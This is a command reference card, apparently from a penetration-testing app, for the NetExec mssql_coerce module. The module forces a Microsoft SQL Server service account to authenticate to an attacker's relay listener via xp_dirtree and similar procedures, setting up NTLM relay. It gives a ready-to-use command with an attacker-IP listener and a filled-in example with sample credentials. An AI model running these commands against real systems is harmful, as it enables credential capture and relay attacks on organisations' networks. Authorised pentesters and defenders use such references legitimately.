NetExec mssql_coerce Module

Coerce the MSSQL service account to authenticate to your relay listener via xp_dirtree / xp_subdirs / xp_fileexist. Lights up the path to NTLM relay against any SQL service account that's actually a domain account.

Tool
nxc
Category
Credential Attacks / NTLM Relay & Coercion
Platform
linux
Requires
password
Protocols
MSSQL

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

nxc mssql <target> -u '<user>' -p '<password>' -M mssql_coerce -o LISTENER=<attacker-ip>

Examples

nxc mssql 10.10.10.10 -u sa -p 'Password123!' --local-auth -M mssql_coerce -o LISTENER=10.10.14.5

Tags

netexec nxc mssql coerce ntlm-relay